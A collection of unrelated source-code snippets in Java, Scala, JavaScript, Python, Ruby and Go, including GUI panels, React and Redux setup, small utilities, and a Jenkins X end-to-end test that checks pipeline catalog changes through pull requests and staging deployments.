setUser((ClientUser) propertyChangeEvent.getNewValue());
}
private void setUser(ClientUser newUser) {
if (this.user != null) {
this.user.removePropertyChangeListener(this.propertyChangeManager);
}
this.user = newUser;
if (this.user != null) {
this.user.addPropertyChangeListener(this.propertyChangeManager);
this.username.setText(" Benutzername: "+ this.user.getName());
}
}
private void createDocument() {
String documentName = this.documentNameField.getText();
this.logger.info(String.format("Trying to create Document %s from gui", documentName));
if (documentName.isBlank()) {
this.window.alert("Geben Sie einen Dokumentnamen ein!", JOptionPane.WARNING_MESSAGE);
return;
}
try {
this.sessionStorage.getLobby().createDocument(documentName);
} catch (InvalidDocumentIdException.DocumentAlreadyExistsException e) {
ExceptionHandler.getExceptionHandler().handle(e, Level.INFO, "Document already exists.", MenuPanel.class);
this.window.alert("Document already exists!", JOptionPane.ERROR_MESSAGE);
return;
}
this.joinDocument();
}
private void joinDocument() {
String documentName = this.documentNameField.getText();
this.logger.info(String.format("Trying to join Document %s from gui", documentName));
if (documentName.isBlank()) {
this.window.alert("Geben Sie einen Dokumentnamen ein!", JOptionPane.WARNING_MESSAGE);
return;
}
try {
Document document = this.lobby.getDocumentById(documentName);
LocalDocument localDocument = new LocalDocument();
this.sessionStorage.getCurrentUser().setDocument(localDocument);
this.sessionStorage.setCurrentSharedDocument(document);
this.window.switchToView(ViewProperties.EDITOR);
this.lobby.joinDocument(this.sessionStorage.getCurrentUser(), documentName);
} catch (InvalidDocumentIdException.DocumentDoesNotExistException e) {
ExceptionHandler.getExceptionHandler().handle(e, Level.INFO, "Could not join document.", MenuPanel.class);
this.window.alert("Document " + documentName + " does not exist!", JOptionPane.ERROR_MESSAGE);
}
}
private void onRefresh() {
this.initialize();
}
}
|
<gh_stars>0
package com.spark.itversity.example
import org.apache.spark.SparkContext
import org.apache.spark.SparkContext._
import org.apache.spark.SparkConf
/**
* @author ollopollo
*/
object simpleSpark {
def main(args : Array[String]){
//println("hi1")
val conf = new SparkConf().setAppName("Simple Application").setMaster("local[2]").set("spark.executor.memory", "1g")
val sc = new SparkContext(conf)
val myFile = sc.textFile("C:\\streaming\\newFile.txt")
val wordspair =myFile.flatMap(row =>row.split(" ")).map(x=>(x,1)).reduceByKey(_+_)
wordspair.foreach(println)
}
}
|
import Component from '@ember/component';
import { inject as service } from '@ember/service';
import { computed } from '@ember/object';
import templateString from 'ember-emojione/-private/cp-macros/template-string';
export default Component.extend({
tone: undefined,
toneSelectAction: () => {},
emojiService: service('emoji'),
tagName: 'button',
classNameBindings: [':eeo-emojiPicker-tone', 'isCurrentClass', 'toneClass'],
isCurrentClass: computed('tone', 'emojiService.currentSkinTone', function () {
return this.get('tone') === this.get('emojiService.currentSkinTone')
? '-current'
: '';
}),
toneClass: templateString("_${tone}"),
click() {
const oldSkinTone = this.get('emojiService.currentSkinTone');
const newSkinTone = this.get('tone');
if (oldSkinTone === newSkinTone) return;
this.set('emojiService.currentSkinTone', newSkinTone);
this.toneSelectAction(newSkinTone);
}
});
|
<filename>src/main/java/de/unistuttgart/ims/coref/annotator/SearchAnnotationPanel.java
package de.unistuttgart.ims.coref.annotator;
import java.awt.BorderLayout;
import java.awt.event.ActionEvent;
import java.awt.event.WindowListener;
import javax.swing.AbstractAction;
import javax.swing.Action;
import javax.swing.ButtonGroup;
import javax.swing.JButton;
import javax.swing.JLabel;
import javax.swing.JList;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JToggleButton;
import javax.swing.ListSelectionModel;
import javax.swing.event.ListSelectionEvent;
import javax.swing.event.ListSelectionListener;
import javax.swing.text.BadLocationException;
import javax.swing.tree.TreePath;
import org.apache.uima.fit.util.JCasUtil;
import org.apache.uima.jcas.JCas;
import org.eclipse.collections.api.list.MutableList;
import org.eclipse.collections.impl.factory.Lists;
import org.kordamp.ikonli.Ikon;
import org.kordamp.ikonli.materialdesign.MaterialDesign;
import de.unistuttgart.ims.coref.annotator.action.IkonAction;
import de.unistuttgart.ims.coref.annotator.api.v1.Flag;
import de.unistuttgart.ims.coref.annotator.api.v1.Mention;
public class SearchAnnotationPanel extends SearchPanel<SearchResultMention> implements WindowListener {
class SearchFlaggedMentions extends IkonAction {
private static final long serialVersionUID = 1L;
String flag;
public SearchFlaggedMentions(String s, String key, Ikon ik) {
super(key, ik);
this.flag = s;
}
@Override
public void actionPerformed(ActionEvent e) {
clearResults();
JCas jcas = searchContainer.getDocumentWindow().getDocumentModel().getJcas();
for (Mention m : JCasUtil.select(jcas, Mention.class)) {
if (Util.isX(m, flag)) {
listModel.addElement(new SearchResultMention(searchContainer, m));
try {
highlights.add(hilit.addHighlight(m.getBegin(), m.getEnd(), painter));
} catch (BadLocationException e1) {
e1.printStackTrace();
}
}
}
updateLabel();
searchContainer.pack();
}
}
class StructuredSearchResultListSelectionListener implements ListSelectionListener {
@Override
public void valueChanged(ListSelectionEvent e) {
if (e.getValueIsAdjusting())
return;
int index = text_list.getSelectedIndex();
SearchResultMention sr;
try {
sr = listModel.get(index);
} catch (ArrayIndexOutOfBoundsException ex) {
return;
}
Mention m = sr.getMention();
Object[] path = searchContainer.getDocumentWindow().getDocumentModel().getTreeModel().getPathToRoot(m);
TreePath tp = new TreePath(path);
searchContainer.getDocumentWindow().getTree().setSelectionPath(tp);
searchContainer.getDocumentWindow().getTree().scrollPathToVisible(tp);
}
}
private static final long serialVersionUID = 1L;
JList<SearchResultMention> text_list;
JLabel selectedEntityLabel = new JLabel();
int limit = 1000;
MutableList<JToggleButton> toggleButtons = Lists.mutable.empty();
public SearchAnnotationPanel(SearchContainer sd) {
super(sd);
JPanel bar = new JPanel();
// bar.setFloatable(false);
ButtonGroup bg = new ButtonGroup();
for (Flag flag : sd.getDocumentWindow().getDocumentModel().getFlagModel().getFlags()) {
if (flag.getTargetClass().equalsIgnoreCase(Mention.class.getName())) {
AbstractAction action = new SearchFlaggedMentions(flag.getKey(), flag.getLabel(),
MaterialDesign.valueOf(flag.getIcon()));
JToggleButton b = new JToggleButton(action);
bg.add(b);
bar.add(b);
toggleButtons.add(b);
}
}
bar.add(new JButton(clearFindings));
JPanel searchPanel = new JPanel();
searchPanel.add(bar);
text_list = new JList<SearchResultMention>(listModel);
text_list.getSelectionModel().addListSelectionListener(new StructuredSearchResultListSelectionListener());
text_list.getSelectionModel().setSelectionMode(ListSelectionModel.SINGLE_SELECTION);
text_list.setCellRenderer(
new SearchResultRenderer<SearchResult>(searchContainer.getText(), searchContainer.getContexts()));
text_list.setVisibleRowCount(10);
text_list.setDragEnabled(false);
JScrollPane listScroller = new JScrollPane(text_list);
setLayout(new BorderLayout());
add(searchPanel, BorderLayout.NORTH);
add(listScroller, BorderLayout.CENTER);
add(searchResultsLabel, BorderLayout.SOUTH);
}
@Override
public void clearEvent() {
toggleButtons.forEach(tb -> tb.getAction().putValue(Action.SELECTED_KEY, Boolean.FALSE));
}
}
|
<reponame>aizatto/timestamp-js
import React from "react";
import "./App.css";
import { Menu } from "./components/menu";
import { Page } from "./components/page";
function App() {
return (
<div className="App">
<Menu />
<Page />
</div>
);
}
export default App;
|
<reponame>harsa/basilisk-react-native
import firebase from "react-native-firebase";
// Redux Store Configuration
import { createStore, applyMiddleware } from 'redux';
import thunk from 'redux-thunk';
import rootReducer from '../reducers/root';
import loggingMiddleware from './middleware/logging';
const configureStore = () => {
//const middleware = applyMiddleware(thunk, loggingMiddleware, firMiddleware(firebase));
const middleware = applyMiddleware(thunk, loggingMiddleware);
return createStore(rootReducer, middleware);
};
const store = configureStore()
export default store;
|
def sum_square_odd_numbers(a, b):
sum = 0
for i in range (a, b+1):
if i % 2 != 0:
sum += i**2
return sum
|
<reponame>zouvier/BlockChain-Voting
/// <reference types="node" />
import { RunState } from './../interpreter';
/**
* Adjusts gas usage and refunds of SStore ops per EIP-2200 (Istanbul)
*
* @param {RunState} runState
* @param {any} found
* @param {Buffer} value
*/
export declare function updateSstoreGasEIP2200(runState: RunState, found: any, value: Buffer, key: Buffer): void;
|
import requests
from bs4 import BeautifulSoup
def fetch_top_result(keyword):
query = "+".join(keyword.split(" "))
url = f"https://www.google.com/search?q={query}"
page = requests.get(url)
soup = BeautifulSoup(page.content, "html.parser")
link = soup.find("div", {"class": "r"}).find("a").get("href")
return link
|
def processInputFile(inputFileName, outputFileName, classId, cssId):
with open(inputFileName, 'r', encoding='utf-8') as inputFile, open(outputFileName, 'w', encoding='utf-8') as outputFile:
for line in inputFile:
if classId in line:
pasteScript(line, outputFile)
elif cssId in line:
pasteCSS(line, outputFile)
else:
outputFile.write(line)
def pasteScript(line, outputFile):
filename = line.split('"')[-2]
with open(filename, 'r', encoding='utf-8') as importFile:
outputFile.write("<script>\n")
for importedLine in importFile:
outputFile.write(importedLine)
outputFile.write("</script>\n")
def pasteCSS(line, outputFile):
filename = line.split('"')[-2]
with open(filename, 'r', encoding='utf-8') as importFile:
outputFile.write("<style>\n")
for importedLine in importFile:
outputFile.write(importedLine)
outputFile.write("</style>\n")
# Example usage
processInputFile('input.html', 'output.html', 'class123', 'css456')
|
export const BANK_ENDPOINT = 'http://192.168.3.112/banks?limit=30&offset=0';
export const IPAPI_ENDPOINT = 'http://ip-api.com/batch/';
export const VALIDATOR_ENDPOINT = 'http://192.168.127.12/validators?limit=30&offset=0';
|
<reponame>dougrich/oauth-aggregator
function bootstrap(
plugins,
config,
express = require('express')
) {
const app = express()
for (const p of plugins) {
p.bootstrap(config, app)
}
return app
}
module.exports = bootstrap
|
function filterByProperty(arr, property, value) {
let filteredArray = [];
for (let i=0; i<arr.length; i++){
if (arr[i][property] === value) {
filteredArray.push(arr[i]);
}
}
return filteredArray;
}
const furniture = filterByProperty(products, 'type', 'furniture');
|
<reponame>getkuby/kube-dsl
module KubeDSL::DSL::Batch::V2alpha1
autoload :CronJob, 'kube-dsl/dsl/batch/v2alpha1/cron_job'
autoload :CronJobList, 'kube-dsl/dsl/batch/v2alpha1/cron_job_list'
autoload :CronJobSpec, 'kube-dsl/dsl/batch/v2alpha1/cron_job_spec'
autoload :CronJobStatus, 'kube-dsl/dsl/batch/v2alpha1/cron_job_status'
autoload :JobTemplateSpec, 'kube-dsl/dsl/batch/v2alpha1/job_template_spec'
end
|
<reponame>yelhouti/jx3-pipeline-catalog
package tests
import (
"context"
"crypto/tls"
"fmt"
"net/http"
"os"
"path/filepath"
"strconv"
"strings"
"testing"
"time"
"github.com/jenkins-x/go-scm/scm"
v1 "github.com/jenkins-x/jx-api/v3/pkg/apis/jenkins.io/v1"
"github.com/jenkins-x/jx-api/v3/pkg/client/clientset/versioned"
"github.com/jenkins-x/jx-application/pkg/applications"
"github.com/jenkins-x/jx-helpers/v3/pkg/cmdrunner"
"github.com/jenkins-x/jx-helpers/v3/pkg/gitclient"
"github.com/jenkins-x/jx-helpers/v3/pkg/gitclient/cli"
"github.com/jenkins-x/jx-helpers/v3/pkg/gitclient/giturl"
"github.com/jenkins-x/jx-helpers/v3/pkg/kube"
"github.com/jenkins-x/jx-helpers/v3/pkg/kube/jobs"
"github.com/jenkins-x/jx-helpers/v3/pkg/kube/jxclient"
"github.com/jenkins-x/jx-helpers/v3/pkg/kube/naming"
"github.com/jenkins-x/jx-helpers/v3/pkg/scmhelpers"
"github.com/jenkins-x/jx-helpers/v3/pkg/stringhelpers"
"github.com/jenkins-x/jx-helpers/v3/pkg/termcolor"
"github.com/jenkins-x/jx-promote/pkg/environments"
"github.com/pkg/errors"
"github.com/stretchr/testify/require"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
)
var (
info = termcolor.ColorInfo
removePaths = []string{".lighthouse", "jenkins-x.yml", "charts", "preview", "Dockerfile"}
)
func TestPipelineCatalogWorksOnTestRepository(t *testing.T) {
repoName := os.Getenv("JOB_NAME")
require.NotEmpty(t, repoName, "no $JOB_NAME defined")
packDir, err := filepath.Abs("../../../packs")
require.NoError(t, err, "failed to find pack dir")
t.Logf("using packs dir %s", packDir)
o := &Options{
T: t,
Repository: repoName,
PackDir: packDir,
PullRequestPollTimeout: 20 * time.Minute,
PullRequestPollPeriod: time.Minute,
ReleasePollTimeout: 20 * time.Minute,
ReleasePollPeriod: 10 * time.Second,
InsecureURLSkipVerify: true,
}
o.Run()
}
type Options struct {
T *testing.T
Owner string
Repository string
GitURL string
PackDir string
Namespace string
MainBranch string
ReleaseBuildNumber string
MergeSHA string
GitOperatorNamespace string
InsecureURLSkipVerify bool
Verbose bool
GitClient gitclient.Interface
CommandRunner cmdrunner.CommandRunner
ScmFactory scmhelpers.Factory
PullRequestPollTimeout time.Duration
PullRequestPollPeriod time.Duration
ReleasePollTimeout time.Duration
ReleasePollPeriod time.Duration
KubeClient kubernetes.Interface
JXClient versioned.Interface
}
// Validate verifies we can lazily create the various clients
func (o *Options) Validate() {
if o.GitOperatorNamespace == "" {
o.GitOperatorNamespace = "jx-git-operator"
}
if o.MainBranch == "" {
o.MainBranch = "master"
}
if o.Owner == "" {
o.Owner = "jenkins-x-labs-bdd-tests"
}
if o.ScmFactory.GitServerURL == "" {
o.ScmFactory.GitServerURL = giturl.GitHubURL
}
if o.GitURL == "" {
o.GitURL = stringhelpers.UrlJoin(o.ScmFactory.GitServerURL, o.Owner, o.Repository)
}
var err error
if o.CommandRunner == nil {
o.CommandRunner = cmdrunner.QuietCommandRunner
}
if o.GitClient == nil {
o.GitClient = cli.NewCLIClient("", o.CommandRunner)
}
if o.ScmFactory.ScmClient == nil {
_, err = o.ScmFactory.Create()
require.NoError(o.T, err, "failed to create ScmClient")
}
o.JXClient, o.Namespace, err = jxclient.LazyCreateJXClientAndNamespace(o.JXClient, o.Namespace)
require.NoError(o.T, err, "failed to create the jx client")
o.KubeClient, err = kube.LazyCreateKubeClient(o.KubeClient)
require.NoError(o.T, err, "failed to create the kube client")
}
// Run runs the test suite
func (o *Options) Run() {
o.Validate()
pr := o.CreatePullRequest()
buildNumber := o.findNextBuildNumber()
o.waitForPullRequestToMerge(pr)
o.verifyPreviewEnvironment(pr)
releasePA := o.waitForReleasePipelineToComplete(buildNumber)
o.waitForPromotePullRequestToMerge(releasePA)
}
// CreatePullRequest creates the pull request with the new build pack
func (o *Options) CreatePullRequest() *scm.PullRequest {
t := o.T
pro := &environments.EnvironmentPullRequestOptions{
ScmClientFactory: o.ScmFactory,
Gitter: o.GitClient,
CommandRunner: o.CommandRunner,
GitKind: o.ScmFactory.GitKind,
OutDir: "",
BranchName: "",
PullRequestNumber: 0,
CommitTitle: "fix: test out pipeline catalog changes",
CommitMessage: "",
ScmClient: o.ScmFactory.ScmClient,
BatchMode: true,
UseGitHubOAuth: false,
Fork: false,
}
pro.Function = func() error {
dir := pro.OutDir
o.Infof("cloned to git dir %s", dir)
for _, p := range removePaths {
path := filepath.Join(dir, p)
err := os.RemoveAll(path)
if err != nil {
return errors.Wrapf(err, "failed to remove %s", path)
}
o.Debugf("removed %s\n", path)
}
c := &cmdrunner.Command{
Dir: dir,
Name: "jx",
Args: []string{"project", "import", "--dry-run", "--batch-mode", "--pipeline-catalog-dir", o.PackDir},
}
out, err := o.CommandRunner(c)
o.Infof(out)
if err != nil {
return errors.Wrapf(err, "failed to run %s", c.CLI())
}
t.Logf("regenerated the pipeline catalog in dir %s", dir)
return nil
}
prDetails := &scm.PullRequest{}
pr, err := pro.Create(o.GitURL, "", prDetails, true)
require.NoError(t, err, "failed to create Pull Request on git repository %s", o.GitURL)
require.NotNil(t, pr, "no PullRequest returned for repository %s", o.GitURL)
prURL := pr.Link
t.Logf("created Pull Request: %s", info(prURL))
return pr
}
// PollLoop polls the given callback until the poll period expires or the function returns true
func (o *Options) PollLoop(pollTimeout, pollPeriod time.Duration, message string, fn func(elapsed time.Duration) (bool, error)) error {
start := time.Now()
end := start.Add(pollTimeout)
durationString := pollTimeout.String()
o.Infof("Waiting up to %s with poll period %s for %s...", durationString, pollPeriod.String(), message)
for {
elapsed := time.Now().Sub(start)
flag, err := fn(elapsed)
if err != nil {
return errors.Wrapf(err, "failed to invoke function")
}
if flag {
return nil
}
if time.Now().After(end) {
return fmt.Errorf("Timed out waiting for %s. Waited %s", message, durationString)
}
time.Sleep(pollPeriod)
}
}
func (o *Options) Debugf(message string, args ...interface{}) {
if o.Verbose {
o.Infof("DEBUG: "+message, args...)
}
}
func (o *Options) Infof(message string, args ...interface{}) {
o.T.Logf(message+"\n", args...)
}
func (o *Options) Warnf(message string, args ...interface{}) {
o.Infof("WARN: "+message, args...)
}
// ActivitySelector returns the activity selector for the repo and branch
func (o *Options) ActivitySelector(branch string) string {
return "owner=" + naming.ToValidName(o.Owner) + ",repository=" + naming.ToValidName(o.Repository) + ",branch=" + naming.ToValidValue(branch)
}
// ActivitySelector returns the activity selector for the repo and branch
func (o *Options) PromoteSelector(repository *scm.Repository, branch string) string {
return "lighthouse.jenkins-x.io/refs.org=" + naming.ToValidName(repository.Namespace) + ",lighthouse.jenkins-x.io/refs.repo=" + naming.ToValidName(repository.Name) + ",lighthouse.jenkins-x.io/branch=" + naming.ToValidValue(branch)
}
func (o *Options) findNextBuildNumber() string {
t := o.T
_, buildNumber, _, err := o.getLatestPipelineActivity(o.MainBranch)
require.NoError(t, err, "failed to find latest PipelineActivity for branch %s", o.MainBranch)
buildNumber++
o.ReleaseBuildNumber = strconv.Itoa(buildNumber)
o.Infof("next PipelineActivity release build number is: #%s", o.ReleaseBuildNumber)
return o.ReleaseBuildNumber
}
func (o *Options) waitForReleasePipelineToComplete(buildNumber string) *v1.PipelineActivity {
t := o.T
jxClient := o.JXClient
ns := o.Namespace
ctx := context.Background()
selector := o.ActivitySelector(o.MainBranch)
lastStatusString := ""
var answer *v1.PipelineActivity
fn := func(elapsed time.Duration) (bool, error) {
resources, err := jxClient.JenkinsV1().PipelineActivities(ns).List(ctx, metav1.ListOptions{LabelSelector: selector})
if err != nil && apierrors.IsNotFound(err) {
err = nil
}
if err != nil {
return false, errors.Wrapf(err, "failed to list PipelineActivity resources in namespace %s with selector %s", ns, selector)
}
for i := range resources.Items {
r := &resources.Items[i]
buildName := r.Spec.Build
if buildName != buildNumber {
continue
}
ps := &r.Spec
status := string(ps.Status)
if status != lastStatusString {
lastStatusString = status
o.Infof("PipelineActivity %s has status %s", info(r.Name), info(status))
}
if ps.Status.IsTerminated() {
answer = r
return true, nil
}
}
return false, nil
}
message := fmt.Sprintf("release complete for PipelineActivity build %s with selector %s", info(o.ReleaseBuildNumber), info(selector))
err := o.PollLoop(o.PullRequestPollTimeout, o.ReleasePollPeriod, message, fn)
require.NoError(t, err, "failed to %s", message)
require.NotNil(t, answer, "no PipelineActivity found for %s", message)
require.Equal(t, v1.ActivityStatusTypeSucceeded, answer.Spec.Status, "status for %s", message)
return answer
}
func (o *Options) getLatestPipelineActivity(branch string) (pa *v1.PipelineActivity, buildNumber int, selector string, err error) {
jxClient := o.JXClient
ns := o.Namespace
ctx := context.Background()
selector = o.ActivitySelector(branch)
var resources *v1.PipelineActivityList
resources, err = jxClient.JenkinsV1().PipelineActivities(ns).List(ctx, metav1.ListOptions{LabelSelector: selector})
if err != nil && apierrors.IsNotFound(err) {
err = nil
}
if err != nil {
return
}
for i := range resources.Items {
r := &resources.Items[i]
buildName := r.Spec.Build
if buildName != "" {
b, err := strconv.Atoi(buildName)
if err != nil {
o.Warnf("failed to convert build number %s to number for PipelineActivity %s: %s", buildName, r.Name, err.Error())
continue
}
if b > buildNumber {
buildNumber = b
pa = r
}
}
}
return
}
func (o *Options) verifyPreviewEnvironment(pr *scm.PullRequest) {
t := o.T
branch := fmt.Sprintf("PR-%d", pr.Number)
pa, _, selector, err := o.getLatestPipelineActivity(branch)
require.NoError(t, err, "failed to find latest PipelineActivity for branch %s", branch)
require.NotNil(t, pa, "could not find a PipelineActivity for selector %s", selector)
previewURL := ""
for i := range pa.Spec.Steps {
s := &pa.Spec.Steps[i]
preview := s.Preview
if preview != nil {
previewURL = preview.ApplicationURL
if previewURL != "" {
break
}
}
}
require.NotEmpty(t, previewURL, "could not find a Preview URL for PipelineActivity %s", pa.Name)
o.Infof("found preview URL: %s", info(previewURL))
statusCode := o.GetAppHttpStatusCode()
o.AssertURLReturns(previewURL, statusCode, o.PullRequestPollTimeout, o.ReleasePollPeriod)
}
func (o *Options) GetAppHttpStatusCode() int {
statusCode := 200
// spring quickstarts return 404 for the home page
if strings.HasPrefix(o.Repository, "spring") {
statusCode = 404
}
return statusCode
}
// ExpectUrlReturns expects that the given URL returns the given status code within the given time period
func (o *Options) AssertURLReturns(url string, expectedStatusCode int, pollTimeout, pollPeriod time.Duration) error {
lastLogMessage := ""
logMessage := func(message string) {
if message != lastLogMessage {
lastLogMessage = message
o.Infof(message)
}
}
fn := func(elapsed time.Duration) (bool, error) {
actualStatusCode, err := o.GetURLStatusCode(url, logMessage)
if err != nil {
return false, nil
}
return actualStatusCode == expectedStatusCode, nil
}
message := fmt.Sprintf("expecting status %d on URL %s", expectedStatusCode, url)
return o.PollLoop(pollTimeout, pollPeriod, message, fn)
}
// GetURLStatusCode gets the URL status code
func (o *Options) GetURLStatusCode(url string, logMessage func(message string)) (int, error) {
transport := &http.Transport{
TLSClientConfig: &tls.Config{
InsecureSkipVerify: o.InsecureURLSkipVerify,
},
}
var httpClient = &http.Client{
Timeout: time.Second * 30,
Transport: transport,
}
response, err := httpClient.Get(url)
if err != nil {
errorMessage := err.Error()
if response != nil {
errorMessage += " status: " + response.Status
}
message := fmt.Sprintf("failed to invoke URL %s got: %s", info(url), errorMessage)
logMessage(message)
return 0, errors.Wrap(err, message)
}
actualStatusCode := response.StatusCode
logMessage(fmt.Sprintf("invoked URL %s and got return code: %s", info(url), info(strconv.Itoa(actualStatusCode))))
return actualStatusCode, nil
}
func (o *Options) waitForPullRequestToMerge(pullRequest *scm.PullRequest) *scm.PullRequest {
t := o.T
jxClient := o.JXClient
ns := o.Namespace
logNoMergeCommitSha := false
logHasMergeSha := false
message := fmt.Sprintf("pull request %s to merge", info(pullRequest.Link))
ctx := context.Background()
repository := pullRequest.Repository()
fullName := repository.FullName
prNumber := pullRequest.Number
o.MergeSHA = ""
var err error
var pr *scm.PullRequest
selector := o.PromoteSelector(&repository, "PR-"+strconv.Itoa(prNumber))
lastStatus := ""
fn := func(elapsed time.Duration) (bool, error) {
// lets wait for there to be at least one PipelineActivity for this branch and for them all to have completed
resources, err := jxClient.JenkinsV1().PipelineActivities(ns).List(ctx, metav1.ListOptions{LabelSelector: selector})
if err != nil && apierrors.IsNotFound(err) {
err = nil
}
if err != nil {
return false, errors.Wrapf(err, "failed to list PipelineActivity resources in namespace %s with selector %s", ns, selector)
}
status := ""
prPipelineComplete := false
if len(resources.Items) == 0 {
status = fmt.Sprintf("no PipelineActivity resources found in namespace %s with selector %s", ns, selector)
} else {
for i := range resources.Items {
r := &resources.Items[i]
status = fmt.Sprintf("PipelineActivity %s has status %s", r.Name, string(r.Spec.Status))
if r.Spec.Status.IsTerminated() {
if r.Spec.Status == v1.ActivityStatusTypeSucceeded {
prPipelineComplete = true
status += "\nnow polling for PullRequest being merged..."
} else {
err = errors.Errorf("PipelineActivity %s has status %s", r.Name, string(r.Spec.Status))
}
}
}
}
if status != lastStatus {
o.Infof(status)
lastStatus = status
}
return prPipelineComplete, err
}
err = o.PollLoop(o.ReleasePollTimeout, o.ReleasePollPeriod, message, fn)
require.NoError(t, err, "failed to %s", message)
// lets sleep a little bit to give keeper a chance to auto merge to minimise github API calls...
time.Sleep(30 * time.Second)
fn = func(elapsed time.Duration) (bool, error) {
pr, _, err = o.ScmFactory.ScmClient.PullRequests.Find(ctx, fullName, prNumber)
if err != nil {
o.Warnf("Failed to query the Pull Request status for %s %s", pullRequest.Link, err)
} else {
if pr.MergeSha != "" {
o.MergeSHA = pr.MergeSha
}
elaspedString := elapsed.String()
if pr.Merged {
if pr.MergeSha == "" && o.MergeSHA == "" {
if !logNoMergeCommitSha {
logNoMergeCommitSha = true
o.Infof("Pull Request %s is merged but we don't yet have a merge SHA after waiting %s", info(pr.Link), elaspedString)
return false, nil
}
} else {
if !logHasMergeSha {
logHasMergeSha = true
o.Infof("Pull Request %s is merged at sha %s after waiting %s", info(pr.Link), info(o.MergeSHA), elaspedString)
return true, nil
}
}
} else {
if pr.Closed {
o.Warnf("Pull Request %s is closed after waiting %s", info(pr.Link), elaspedString)
return true, nil
}
}
}
return false, nil
}
err = o.PollLoop(o.PullRequestPollTimeout, o.PullRequestPollPeriod, message, fn)
require.NoError(t, err, "failed to %s", message)
return pr
}
func (o *Options) waitForPromotePullRequestToMerge(pa *v1.PipelineActivity) {
t := o.T
version := pa.Spec.Version
prURL := ""
for i := range pa.Spec.Steps {
s := &pa.Spec.Steps[i]
promote := s.Promote
if promote != nil && promote.PullRequest != nil {
prURL = promote.PullRequest.PullRequestURL
if prURL != "" {
break
}
}
}
require.NotEmpty(t, version, "could not find the version for PipelineActivity %s", pa.Name)
require.NotEmpty(t, prURL, "could not find the Promote PullRequest URL for PipelineActivity %s", pa.Name)
o.Infof("found Promote Pull Request: %s", info(prURL))
pr, err := scmhelpers.ParsePullRequestURL(prURL)
require.NoError(t, err, "failed to parse Pull Request: %s", prURL)
o.waitForPullRequestToMerge(pr)
require.NotEmpty(t, o.MergeSHA, "no merge SHA for the promote Pull Request %s", prURL)
o.waitForSuccessfulBootJob(o.MergeSHA)
o.waitForVersionInStaging(version)
}
func (o *Options) waitForSuccessfulBootJob(sha string) {
t := o.T
selector := "app=jx-boot,git-operator.jenkins.io/commit-sha=" + sha
message := fmt.Sprintf("successful Job in namespace %s with selector %s", info(o.GitOperatorNamespace), info(selector))
ctx := context.Background()
ns := o.GitOperatorNamespace
kubeClient := o.KubeClient
lastStatus := ""
fn := func(elapsed time.Duration) (bool, error) {
resources, err := kubeClient.BatchV1().Jobs(ns).List(ctx, metav1.ListOptions{LabelSelector: selector})
if err != nil && apierrors.IsNotFound(err) {
err = nil
}
if err != nil {
return false, errors.Wrapf(err, "failed to list Jobs in namespace %s with selector %s", ns, selector)
}
jobName := ""
answer := false
status := "Pending"
count := len(resources.Items)
if count == 0 {
status = fmt.Sprintf("no jobs found matching selector %s", selector)
} else {
if count > 1 {
o.Warnf("found %s Jobs in namespace %s with selector %s", count, ns, selector)
}
// lets use the last one
job := &resources.Items[count-1]
jobName = job.Name
if jobs.IsJobFinished(job) {
if jobs.IsJobSucceeded(job) {
status = "Succeeded"
answer = true
} else {
status = "Failed"
err = errors.Errorf("job %s has failed", job.Name)
}
} else {
if job.Status.Active > 0 {
status = "Running"
}
}
}
if status != lastStatus {
lastStatus = status
if jobName != "" {
o.Infof("boot Job %s has status: %s", info(jobName), info(status))
} else {
o.Infof("status: %s", info(status))
}
}
return answer, err
}
err := o.PollLoop(o.ReleasePollTimeout, o.ReleasePollPeriod, message, fn)
require.NoError(t, err, "failed to poll for completed Job in namespace %s for selector %s", ns, selector)
}
func (o *Options) waitForVersionInStaging(version string) {
t := o.T
message := fmt.Sprintf("waiting for version %s to be in Staging", info(version))
ns := o.Namespace
expectedStatusCode := o.GetAppHttpStatusCode()
lastStatus := ""
fn := func(elapsed time.Duration) (bool, error) {
list, err := applications.GetApplications(o.JXClient, o.KubeClient, ns)
if err != nil {
return false, errors.Wrap(err, "fetching applications")
}
answer := false
status := ""
if len(list.Items) == 0 {
status = "No applications found"
}
for i := range list.Items {
app := &list.Items[i]
name := app.Name()
if !strings.HasPrefix(name, o.Repository) {
continue
}
envs := app.Environments
if envs != nil {
env := envs["staging"]
depName := ""
foundVersion := ""
for j := range env.Deployments {
dep := &env.Deployments[j]
depVersion := dep.Version()
if version == depVersion {
appURL := dep.URL(o.KubeClient, app)
status = fmt.Sprintf("has version %s running in staging at: %s", version, appURL)
if appURL != "" {
logMessage := func(message string) {
status += " " + message
}
actualStatusCode, err := o.GetURLStatusCode(appURL, logMessage)
if err != nil {
o.Warnf("failed to get URL %s")
} else {
status += fmt.Sprintf(" got status code %d", actualStatusCode)
if actualStatusCode == expectedStatusCode {
answer = true
}
}
}
break
} else {
foundVersion = depVersion
depName = dep.Name
}
}
if !answer {
o.Infof("app %s has deployment %s with version %s", name, depName, foundVersion)
}
}
}
if status != lastStatus {
lastStatus = status
o.Infof(status)
}
return answer, nil
}
err := o.PollLoop(o.ReleasePollTimeout, o.ReleasePollPeriod, message, fn)
require.NoError(t, err, "failed to wait for version %s to be in Staging", ns, version)
}
|
// A function to calculate the minimum distance between four cities.
function minDistance(distMatrix) {
let source = 0,
dest = 0,
min = Infinity,
currentDistance;
// Using two for loops to compare distance between all possible pairs
for (let i = 0; i < distMatrix.length; i++) {
for (let j = 0; j < distMatrix.length; j++) {
currentDistance = distMatrix[i][j];
if (currentDistance < min && i !== j) {
min = currentDistance;
source = i;
dest = j;
}
}
}
return {
source: source,
dest: dest,
minDistance: min
};
}
minDistance([[0, 9, 11, 7], [9, 0, 10, 15], [11, 10, 0, 6], [7, 15, 6, 0]]);
|
/*
* Copyright 2017-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0/
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*
* Note: this file was adapted from the sample at https://github.com/aws-samples/aws-amplify-vue/blob/master/src/router/index.js
*/
import Vue from 'vue';
import Router from 'vue-router';
import BroadcastMonitor from '@/components/BroadcastMonitor';
import Signin from '@/components/Signin';
import {AmplifyEventBus} from 'aws-amplify-vue';
